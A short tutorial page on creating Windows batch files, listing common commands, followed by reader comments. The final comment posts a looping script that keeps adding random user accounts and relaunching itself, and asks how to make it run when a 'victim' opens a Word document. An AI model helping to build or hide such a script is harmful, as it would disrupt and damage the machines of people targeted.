Creating a batch file is super easy and can often help you to finish annoying, repetitive tasks a bit quicker. Here’s a quick guide that teaches you how to create a batch file.
1. Step Simply open the notepad (enter notepad into the search field and hit enter)
2. Step Start writing your command line commands (list of commands below)
3. Step Save the file as a .bat file and here’s the clue, select “All files” from the dropdown:
Writing a batch file is simple if you know basic programming. For example IF and DO can be used in a batch file. Also IF EXIST and COPY are two useful commands.
IF EXIST randomfile.file COPY C:\myfile.txt %APPDIR%/myfile.txt
Command Line Commands
Because there are so many commands, you should check out this: list of commands from A to Z
Some useful commands:
DEL
RENAME
MOVE
IF … DO …
COPY
XCOPY
IPCONFIG
DIR
ATTRIB
Actually, you can use every command that you have ever used in a Windows command prompt and it will magically work in a batch file as well *grin*
What do you do about the “Yes” or “no” ( Y or N) after “Are you sure”? Is that prompt unnecessary in a batch file? (I’m writing a file to recover the reg hives – many copy commands)
Is there any way you can make the .bat file open when someone opens a word document? In the .bat file I made, I typed the following:
@echo off
echo
:add
net user %random% /add
start acf.bat
goto add
I want this script to open at the same time my victim opens a word document in the same folder. Any help?